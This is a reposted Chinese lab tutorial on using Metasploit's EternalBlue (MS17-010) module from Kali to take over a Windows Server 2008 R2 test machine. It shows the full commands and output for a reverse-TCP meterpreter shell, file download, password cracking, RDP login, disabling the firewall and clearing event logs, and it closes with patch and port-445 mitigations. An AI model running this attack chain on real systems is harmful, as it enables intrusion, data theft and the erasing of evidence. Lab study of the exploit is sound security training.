KALI利用MS17-010漏洞入侵
生活随笔
收集整理的這篇文章主要介紹了
KALI利用MS17-010漏洞入侵
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
KALI利用MS17-010漏洞入侵
實驗環(huán)境
靶機 : Windows Server 2008 R2 ,開放445端口( Windows防火墻不必關(guān)閉)。
攻擊機: KALI,利用Meterpreter滲透工具漏洞︰MS17-010永恒之藍(EternalBlue)漏洞。
操作步驟
1)先利用NMAP掃描靶機是否開啟了445端口。
2)在kali上啟動msfconsole
3)掃描靶機的漏洞情況
4)利用MS17-010漏洞攻擊靶機
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue //切換到漏洞攻擊腳本 msf5 exploit(windows/smb/ms17_010_eternalblue) > msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //使用反彈鏈接payload,讓靶機主動連接KALI payload => windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms17_010_eternalblue) > msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.10.129 //靶機IP地址 rhost => 192.168.10.129 msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.128 //KAL地址 lhost => 192.168.10.128 msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit //開始攻擊[*] Started reverse TCP handler on 192.168.10.128:4444 [*] 192.168.10.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.10.129:445 - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit) [*] 192.168.10.129:445 - Scanned 1 of 1 hosts (100% complete) [*] 192.168.10.129:445 - Connecting to target for exploitation. [+] 192.168.10.129:445 - Connection established for exploitation. [+] 192.168.10.129:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.10.129:445 - CORE raw buffer dump (46 bytes) [*] 192.168.10.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76 Windows Web Serv [*] 192.168.10.129:445 - 0x00000010 65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20 er 2008 R2 7601 [*] 192.168.10.129:445 - 0x00000020 53 65 72 76 69 63 65 20 50 61 63 6b 20 31 Service Pack 1 [+] 192.168.10.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.10.129:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.10.129:445 - Sending all but last fragment of exploit packet [*] 192.168.10.129:445 - Starting non-paged pool grooming [+] 192.168.10.129:445 - Sending SMBv2 buffers [+] 192.168.10.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.10.129:445 - Sending final SMBv2 buffers. [*] 192.168.10.129:445 - Sending last fragment of exploit packet! [*] 192.168.10.129:445 - Receiving response from exploit packet [+] 192.168.10.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.10.129:445 - Sending egg to corrupted connection. [*] 192.168.10.129:445 - Triggering free of corrupted buffer. [*] Sending stage (201283 bytes) to 192.168.10.129 [*] Meterpreter session 1 opened (192.168.10.128:4444 -> 192.168.10.129:49159) at 2020-11-27 12:06:37 +0800 [+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=meterpreter > //攻擊成功,此時靶機已經(jīng)可以被控制5)列出靶機C盤下的目錄文件
6)下載文件
7)破解用戶密碼
密文可到www.cmd5.com中去破解。
8)遠程桌面登錄靶機
root@KALI:~# rdesktop -u administrator -p abc123 192.168.10.129:33899)屏幕截圖
10)關(guān)閉防火墻
meterpreter > shell //進入靶機的命令提示符環(huán)境 Process 2848 created. Channel 4 created. Microsoft Windows [�汾 6.1.7601] ��?���� (c) 2009 Microsoft Corporation����������?����C:\> C:\>netsh advfirewall set allprofiles state off //關(guān)閉靶機的防火墻 netsh advfirewall set allprofiles state off ?����C:\>11)清楚事件日志
清除前,在靶機上可以看見所有事件日志。
在KALI上清除日志信息
再去靶機上查看,發(fā)現(xiàn)只有一條清楚日志的記錄.
MS17-010漏洞防范
1) 打補丁
KB976932 ( SP1 )、KB4012212、KB4012215
2) 利用系統(tǒng)防火墻高級設(shè)置阻止向445端口進行連接
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 192.168.10.128:4444 [*] 192.168.10.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.10.129:445 - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit) [*] 192.168.10.129:445 - Scanned 1 of 1 hosts (100% complete) [*] 192.168.10.129:445 - Connecting to target for exploitation. [+] 192.168.10.129:445 - Connection established for exploitation. [+] 192.168.10.129:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.10.129:445 - CORE raw buffer dump (46 bytes) [*] 192.168.10.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76 Windows Web Serv [*] 192.168.10.129:445 - 0x00000010 65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20 er 2008 R2 7601 [*] 192.168.10.129:445 - 0x00000020 53 65 72 76 69 63 65 20 50 61 63 6b 20 31 Service Pack 1 [+] 192.168.10.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.10.129:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.10.129:445 - Sending all but last fragment of exploit packet [*] 192.168.10.129:445 - Starting non-paged pool grooming [+] 192.168.10.129:445 - Sending SMBv2 buffers [+] 192.168.10.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.10.129:445 - Sending final SMBv2 buffers. [*] 192.168.10.129:445 - Sending last fragment of exploit packet! [*] 192.168.10.129:445 - Receiving response from exploit packet [+] 192.168.10.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.10.129:445 - Sending egg to corrupted connection. [*] 192.168.10.129:445 - Triggering free of corrupted buffer. [-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= msf5 exploit(windows/smb/ms17_010_eternalblue) >可以看到連接失敗!!!
總結(jié)
以上是生活随笔為你收集整理的KALI利用MS17-010漏洞入侵的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: python编写一个汽车类_python
- 下一篇: Pr 视频效果:变换